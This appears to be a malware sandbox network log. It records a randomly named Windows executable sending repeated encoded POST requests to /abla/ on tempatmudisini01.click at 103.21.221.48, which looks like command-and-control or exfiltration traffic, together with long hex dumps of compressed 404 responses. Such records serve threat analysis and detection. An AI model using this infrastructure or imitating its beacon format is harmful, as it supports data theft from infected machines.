                                                                                                      Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                                      Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                                                                                      Oct 8, 2024 15:56:30.980583906 CEST224INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                                                                                      Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCn
                                                                                                      Oct 8, 2024 15:56:30.980595112 CEST1236INData Raw: 70 b1 68 5a f8 6c dc 33 ba df 95 d9 0b f5 be 36 16 a7 53 8f aa 05 a9 7d 10 ba 06 db ef f7 1a 07 78 dd b6 97 78 21 f8 59 76 4f 55 3c e7 3c cd 97 3c 29 a5 ce 91 20 c2 3d 37 49 52 51 39 76 dc c8 3f ab 3a e0 39 c4 a4 68 48 3a 0e 52 a9 77 28 9a df 1c
                                                                                                      Data Ascii: phZl36S}xx!YvOU<<<) =7IRQ9v?:9hH:Rw(:KyIjXcI*Xkts?:)IkRB5WQ?d4_H15IB5cJ6L(IyWW`dG"\Y8Iil*2_'d*3S<HQCy9
                                                                                                      Oct 8, 2024 15:56:30.981065989 CEST224INData Raw: 17 54 62 32 80 3b b2 77 3a 55 0d 05 51 55 51 dc aa 61 7e ab 8a f9 ad 1a 16 b7 aa 58 dc aa 61 79 ab 8a e5 ad 1a 56 b7 2a 58 dd 9e 9e d1 99 20 02 96 f9 86 37 78 b8 46 d1 64 32 99 b4 d3 0b 0b 1f d0 49 ff 5c 1e b9 47 30 c2 a4 26 75 6d 1b cc 66 db b9
                                                                                                      Data Ascii: Tb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hvQ%ZIKxvvViV-j>zY`-[VSj<i&Y1^OE~kpo.
                                                                                                      Oct 8, 2024 15:56:30.981077909 CEST1236INData Raw: 7a 0d 4b b6 5e bf 4f a3 39 2b f2 79 c9 45 e0 4b fc 83 6d 16 c5 a7 5b 76 bb 39 6e 58 be 2a 5e 3e 90 e7 74 c9 d6 d0 3a cf 81 b0 f7 fa c4 56 9b c5 b1 e1 ff 66 e9 95 1a 68 00 f5 3e 2e 10 39 35 74 f6 12 fe 90 0d 9e 32 bd fc 8c c2 35 8c 49 42 bd 3e 27
                                                                                                      Data Ascii: zK^O9+yEKm[v9nX*^>t:Vfh>.95t25IB>'mtN&`@l(fbg%@/h-V5Vx^ ^f@V6dT3RG[Q#Noncz\1Z`{'vKHObayu&=2*
                                                                                                      Oct 8, 2024 15:56:30.981087923 CEST224INData Raw: a2 a7 cc 08 2d 66 4d 85 19 d8 fc 9a 28 d9 57 26 b1 54 3c 8e 6f 05 b9 6c 58 45 80 fc b1 10 31 4f 98 42 63 80 27 c4 4e 49 e7 bb bb e2 35 95 f4 ef 51 04 97 28 73 66 fe e0 45 ac 1c cc 7c 62 91 6e a0 27 2f d7 4e 8b da 36 38 9a 95 c1 dc 0c 61 1a 56 80
                                                                                                      Data Ascii: -fM(W&T<olXE1OBc'NI5Q(sfE|bn'/N68aVI_jl?n9M!dP(GJ5VY^B,DX|MfDv6X;,4\M&.|(3N n)tjg|6!G3e
                                                                                                      Oct 8, 2024 15:56:30.981100082 CEST1236INData Raw: 62 c6 1b 89 92 7b 27 dc a5 b1 06 73 67 30 8e 0b 31 87 ca 9c 4f 0f 87 55 0c b7 1f 86 17 9c af eb bd d8 82 3c 9e 28 75 87 7d c9 d3 bc 58 a4 f9 66 05 f9 c4 6b 84 7b 46 47 73 5e be e0 7c b5 17 f9 b7 42 be 43 7c 9d e6 ab 30 41 31 6d d8 52 6c d6 af 72
                                                                                                      Data Ascii: b{'sg01OU<(u}Xfk{FGs^|BC|0A1mRlr|DtANjo+{FL5!ky`\E(jV9Emt/29[s+&1n$BPNx*[KbiAvlKlcGhX{Bqoo#(
                                                                                                      Oct 8, 2024 15:56:30.981111050 CEST1236INData Raw: 2e 2d 14 be 36 28 bb db 18 57 16 8a 16 3b ed d4 ed 4c bd 56 dd fa 16 a3 ec 08 f1 39 4c ba cf 32 1b 6d ba 7d bf c4 e5 a1 75 17 43 51 55 54 88 8a 22 01 fe 23 9a 87 f6 82 5a d3 1a a9 10 8a 00 72 fe 23 12 3d 2b e7 e4 a1 c9 be 25 0d 27 bc a0 10 54 08
                                                                                                      Data Ascii: .-6(W;LV9L2m}uCQUT"#Zr#=+%'TNoGSkr=rKRN]kM9+s5E9-h^[WTk jD6#b(6:+FR=9UT XjtYSD$e`33kVS_Bb
                                                                                                      Oct 8, 2024 15:56:30.981332064 CEST1236INData Raw: 2a 71 be 2c de 5c 64 9b 11 f8 39 bc 08 30 e4 34 8e 8f 67 2d a0 ee 16 73 5d de 14 16 5f 27 58 e2 14 ab 3a cb a3 c4 b6 41 ef 82 a4 5f 93 7b 23 24 18 eb 41 84 1b 34 b8 35 01 c2 fb 43 72 c0 20 65 1a c5 f9 8f e4 aa 1f 47 3c 84 e8 82 0f 8e b9 21 89 79
                                                                                                      Data Ascii: *q,\d904g-s]_'X:A_{#$A45Cr eG<!yd?L!.rdO$,rC^GnXDR/@*)f#fY$+VRh"!^<oxJ1srI&mhq q$df"=YC7\"UJw$A4
                                                                                                      Oct 8, 2024 15:56:30.981343985 CEST1236INData Raw: 2b 32 f2 5f b9 72 82 6f e2 a0 73 47 e7 f0 d0 72 ee 49 6d c4 cd 98 f7 59 75 81 0e 11 49 6f be 39 62 2b da 28 b4 1e d2 e3 06 45 93 17 26 bc 5c 3b 4e 87 18 d7 1c fd 30 71 cb dc 9f 3a bc 38 6f ee a1 6d 0a a7 f8 b6 27 74 78 2c 30 80 b4 f3 37 d9 f6 87
                                                                                                      Data Ascii: +2_rosGrImYuIo9b+(E&\;N0q:8om'tx,07OD36?7LP&p&yFqr,>S(tB@YWj,@N5U*SuUS*h7j .tPI4*7%xEsB-|k\h3
                                                                                                      Oct 8, 2024 15:56:30.985984087 CEST1236INData Raw: b0 f4 ab 37 da f0 4a 6a 0b e6 21 ff da c8 f0 f1 dd 9f e4 f5 b3 9b 95 f1 ee fd 2f 46 54 3e 8a e7 4e 39 5b 33 7b b4 df 3b df 18 ce 99 24 36 40 ea 56 85 5e c0 67 e3 9a 37 0e bd 07 0b 22 23 60 78 e5 b5 04 d9 54 64 b0 54 19 d1 50 6b d4 a5 95 4a d1 83
                                                                                                      Data Ascii: 7Jj!/FT>N9[3{;$6@V^g7"#`xTdTPkJw]y^,R[^N9H7lA680*n`wcg!;nf9emXAvF3x3in`Mdm.dO0X?dCa|/5X_;4BUHuKq8!T


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.1150003103.21.221.4803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:32.044717073 CEST774OUTPOST /abla/ HTTP/1.1
                                                                                                      Host: www.tempatmudisini01.click
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.tempatmudisini01.click
                                                                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4b 43 69 65 50 6c 4e 59 74 71 36 6b 6d 75 59 6b 6d 61 4e 78 59 4a 73 73 54 70 77 79 55 2b 45 69 51 75 38 58 33 65 6e 71 53 59 6a 70 6c 6c 51 55 2f 62 48 35 54 64 70 5a 4a 36 57 41 64 58 33 44 38 6b 57 47 41 30 6e 76 58 2f 62 58 63 79 72 6d 4c 64 76 44 75 52 30 75 78 65 61 62 7a 65 39 43 78 45 52 6b 37 7a 36 6d 53 4c 42 4d 34 46 56 6f 4f 66 6e 5a 4f 76 7a 6d 65 52 4d 52 63 57 51 6f 73 53 35 39 2f 64 5a 32 67 57 37 75 76 4d 63 32 6a 71 71 41 67 58 35 65 76 51 2f 61 52 73 32 7a 44 69 52 32 71 6f 38 4a 36 30 4f 73 70 38 36 56 32 71 63 6b 72 58 44 77 45 52 37 42 74 63 75 6b 47 44 68 72 76 4f 34 4e 63 6b 77 3d
                                                                                                      Data Ascii: gP=c/pvFaX75Hx8KCiePlNYtq6kmuYkmaNxYJssTpwyU+EiQu8X3enqSYjpllQU/bH5TdpZJ6WAdX3D8kWGA0nvX/bXcyrmLdvDuR0uxeabze9CxERk7z6mSLBM4FVoOfnZOvzmeRMRcWQosS59/dZ2gW7uvMc2jqqAgX5evQ/aRs2zDiR2qo8J60Osp86V2qckrXDwER7BtcukGDhrvO4Nckw=
                                                                                                      Oct 8, 2024 15:56:33.258434057 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                      x-litespeed-tag: 894_HTTP.404
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                      x-litespeed-cache-control: no-cache
                                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: br
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 08 Oct 2024 13:56:33 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                                      Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                                                                                      Oct 8, 2024 15:56:33.258455992 CEST1236INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                                                                                      Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S
                                                                                                      Oct 8, 2024 15:56:33.258466959 CEST1236INData Raw: 03 67 54 c8 60 cc c5 34 3d ae f6 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c
                                                                                                      Data Ascii: gT`4=!p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~
                                                                                                      Oct 8, 2024 15:56:33.258479118 CEST1236INData Raw: 25 57 2f b3 9a fc 88 a2 2b 8a 8e 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf
                                                                                                      Data Ascii: %W/+i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/g
                                                                                                      Oct 8, 2024 15:56:33.258501053 CEST896INData Raw: 53 0c 9e 26 9c 45 5c ea 34 3d 94 0d 24 52 8b 33 49 30 99 64 36 0e 4c 0e a2 e0 22 01 25 93 0d 03 e3 fe 79 ec ca c5 f1 61 75 88 ba 67 b9 a6 cc 4c 96 83 f3 83 cd c2 bc f8 b0 f9 b5 9b e2 6a 73 e8 f6 0b ae 27 fd bb 82 5c 7d 4a 8e 13 97 2d ec 17 cd 7f
                                                                                                      Data Ascii: S&E\4=$R3I0d6L"%yaugLjs'\}J-D\n4Moz^Dm]jaG!c,F!4y;&<+D\@[0W0*-Kdo\O@5xN=0E!Ws;LpD}M]hP2{=$
                                                                                                      Oct 8, 2024 15:56:33.258514881 CEST1236INData Raw: 65 60 33 1a 33 6b 56 53 13 a8 5f f7 9c a2 42 d5 b4 62 e1 8c 76 3a b6 d1 b4 e5 58 6c 40 32 86 16 dc 50 21 4d 0a 8e 06 41 51 73 2a 14 8f 11 34 c1 15 71 c7 19 db 87 2b 2a b8 a6 68 f4 28 42 2b aa 34 55 9a 98 9b 20 bb f6 1e 5e 51 4e 8d 28 32 1b ea 8f
                                                                                                      Data Ascii: e`33kVS_Bbv:Xl@2P!MAQs*4q+*h(B+4U ^QN(2-_!)_)6"#e4k*xphV$uF?2*>FXNyG"m[3\HM%ABsQIQ4q9)B_iO/IA(n~A^]Y|l^]6(?B}
                                                                                                      Oct 8, 2024 15:56:33.258524895 CEST224INData Raw: 81 22 ba e1 b7 e8 03 55 4a 77 cc 90 eb b6 24 f2 41 34 1b c3 e9 ae 15 c0 76 d3 62 9f 20 e9 7e 75 8e 00 d6 b6 07 0a c4 1a 4c b2 65 63 03 9e 18 7e 0e 36 6e 97 17 0a 3e be 3b 2f f4 01 9c 8a 2f 1a 72 f4 5f 3a e4 e8 37 60 c8 d1 23 34 38 2b d1 0c 92 dd
                                                                                                      Data Ascii: "UJw$A4vb ~uLec~6n>;//r_:7`#48+1*nI{Fx :8]W*vh#_a$O~!z`uW{0iF"Uq5'Hd%.q\=@)DzaiCEzvL!VjsD0J0jThG1
                                                                                                      Oct 8, 2024 15:56:33.258538008 CEST1236INData Raw: 27 74 d1 12 76 a6 02 e4 a0 16 8d a2 b1 b9 b8 3e 47 74 1b b5 42 ce 98 d4 62 09 aa bd 08 f5 f5 39 8a 77 39 ad 9c e7 28 09 50 c1 3e 4b a1 6d ef 1c 2c 11 ff 6d 9e 88 55 12 ed 86 2b e7 39 ea e8 65 d9 5b 39 cf d1 84 03 3b 6c 2c d1 97 78 d9 89 d2 15 7a
                                                                                                      Data Ascii: 'tv>GtBb9w9(P>Km,mU+9e[9;l,xzQ|wH6\=vHuWJ4eF>!-)ji:,6Sd5Z6%S*ZYQv-ek7oIlA$pr@u{|Brf:=->&s
                                                                                                      Oct 8, 2024 15:56:33.258553982 CEST224INData Raw: 9f 5a c5 7a ca fb 46 b7 91 57 6d 62 b0 34 8b ca b0 36 00 f9 56 3d 19 61 b4 d7 6e 8b 10 d8 47 a1 6f f7 c8 e8 b2 39 f6 39 d2 db dd 9c e3 b8 13 a5 ee 74 11 1b 28 42 f7 7c 94 3d 0c 29 c7 b0 91 87 45 10 d8 51 09 4c 49 b1 11 bc 67 1d 2f 15 a6 a8 5a 27
                                                                                                      Data Ascii: ZzFWmb46V=anGo99t(B|=)EQLIg/Z']YX{8wv7mjy4%{?N1U2LI]s)sm4#.#=UIaP\[X=AbN'i&]D(A
                                                                                                      Oct 8, 2024 15:56:33.258564949 CEST1236INData Raw: 7e 66 51 d9 81 b0 78 cb 21 c5 95 03 ea 43 8f 50 a2 d2 7d 64 eb e4 e2 42 41 7b 3a dc c3 a1 c4 a5 25 51 37 3c 7f 61 72 3f f4 45 55 11 4b 76 dd c9 81 58 4f 0d e1 7a 07 17 27 d6 7d b6 60 ba d1 78 74 ef 8f 61 cb 98 42 ff 02 83 2c 01 d1 ff 52 79 9f 08
                                                                                                      Data Ascii: ~fQx!CP}dBA{:%Q7<ar?EUKvXOz'}`xtaB,Ry*/;rnO<6H[_}M;}yf,d.q;[3rj90kU!LJ'wa?54L!#H8!c/W5t-.561yHN
                                                                                                      Oct 8, 2024 15:56:33.263509035 CEST1236INData Raw: 18 8b 28 03 03 35 33 e1 ec 1a 6c b5 9e b7 de 69 b1 6b 82 d9 58 72 df ef 13 a4 36 60 12 13 a8 69 26 83 a4 a7 76 33 5b 52 82 40 4a 92 37 73 53 54 c1 dc 73 96 28 d0 d5 10 50 29 93 6e 15 21 10 4d 26 60 41 0b 58 10 2c cb 41 43 63 45 6a e3 d0 20 bf 34
                                                                                                      Data Ascii: (53likXr6`i&v3[R@J7sSTs(P)n!M&`AX,ACcEj 4kvl$Nk.vC,VByLfjh/xMIX$%IJQc&+ )IpR#HIQ: =*GH#2Ok:=1)Pif,j`RdBFK|\y=3=g4


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.1150004103.21.221.4803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:34.583652020 CEST1787OUTPOST /abla/ HTTP/1.1
                                                                                                      Host: www.tempatmudisini01.click
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.tempatmudisini01.click
                                                                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4b 43 69 65 50 6c 4e 59 74 71 36 6b 6d 75 59 6b 6d 61 4e 78 59 4a 73 73 54 70 77 79 55 2f 51 69 51 37 77 58 78 35 37 71 56 59 6a 70 37 56 51 76 2f 62 47 72 54 63 4e 64 4a 36 61 51 64 56 50 44 7a 6d 65 47 51 56 6e 76 4d 76 62 58 56 53 72 6e 50 64 75 65 75 52 6b 71 78 64 79 62 7a 65 39 43 78 46 68 6b 38 69 36 6d 55 4c 42 50 37 46 56 61 5a 76 6e 39 4f 76 4c 32 65 52 4a 6d 63 6d 77 6f 74 79 70 39 39 4c 6c 32 39 47 37 73 71 4d 64 7a 6a 71 6d 6c 67 58 6b 6e 76 52 4c 30 52 76 6d 7a 54 30 34 54 32 37 63 77 76 6c 54 59 30 4d 4f 45 33 50 6b 2f 79 46 6a 4b 50 55 4c 66 2b 34 4f 33 62 52 77 56 72 66 77 6d 4e 67 79 4c 33 45 67 77 35 63 65 56 73 44 74 66 61 57 66 63 44 72 4e 38 41 68 59 68 4a 44 6d 75 2f 63 69 4d 75 6a 6a 67 59 2b 32 4e 32 69 6d 44 6a 54 61 4b 4c 56 55 57 51 77 6c 6e 61 50 43 38 4d 59 51 31 70 48 2b 54 44 73 79 70 67 50 61 57 54 68 62 45 77 45 36 68 76 79 37 4f 4a 75 55 30 64 39 76 47 62 72 65 37 6a 67 47 43 41 7a 67 36 6c 4a 61 48 4b 4d 4c 2f 6e 69 64 [TRUNCATED]
                                                                                                      Data Ascii: gP=c/pvFaX75Hx8KCiePlNYtq6kmuYkmaNxYJssTpwyU/QiQ7wXx57qVYjp7VQv/bGrTcNdJ6aQdVPDzmeGQVnvMvbXVSrnPdueuRkqxdybze9CxFhk8i6mULBP7FVaZvn9OvL2eRJmcmwotyp99Ll29G7sqMdzjqmlgXknvRL0RvmzT04T27cwvlTY0MOE3Pk/yFjKPULf+4O3bRwVrfwmNgyL3Egw5ceVsDtfaWfcDrN8AhYhJDmu/ciMujjgY+2N2imDjTaKLVUWQwlnaPC8MYQ1pH+TDsypgPaWThbEwE6hvy7OJuU0d9vGbre7jgGCAzg6lJaHKML/nidk37ajRnySG2rz4hSgUv2ojeQp8oHNAy7WQKzuh3+aduGIC1Z85lP+QGCt3xlTA4uFUeh134YjgoeOjstJplo/mpRfIpqrOVu4p6n/cT5/eGdtv4j4bbp1FhDIT9ue64I50mU702WF4qx7xFhN6CowXYMrnwQvW36kqSC+T/Nl0ejN2lUffYFvB2Cxk5PAi8gRe/Li5YdQSH7kqoAJs793XKTvFmPJwF5bOGujTM1Z0GRhOEqCPLliWJkj4XY+eCTcPs6JQa9hrLx89OsIKY2y7//fD5ouCuH1WFSWew4YYWJGDpCAJHFl57ejH1ZCN2fKkI0itFKK84xoCvYGEdpbp56L3AHhy2ylMRRCqdb1pUv5yfN3iCwhbmDqH3szEiLP/+s36ej2SMJODi9nkZ8SZjLz7GlNbcUh962Fo6oPhHdnVgNblBgpRJJULqvvgvV7jNK5ZMJ5tlRbJQaXPzYU3buiiCcyYkHwd2RbZtuI6k+N89cJomZt7Bi7YeE10V1YKBI9CNxWTrn/6fDaUaBADAFY/C2wyAjgqZye07jC2Y64WIdYYShzEITcMq0stqnrZC/AsZb/0h0Z9mcodvpYNlpTg69FfX3l4N2+9PGntROJq4ljoY9NUkN4bWC9xalJVAoCcjkkC6xEnTvrOkC1vFFJdiI8h413z [TRUNCATED]
                                                                                                      Oct 8, 2024 15:56:35.789258957 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                      x-litespeed-tag: 894_HTTP.404
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                      x-litespeed-cache-control: no-cache
                                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: br
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 08 Oct 2024 13:56:35 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                                      Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                                                                                      Oct 8, 2024 15:56:35.789275885 CEST224INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
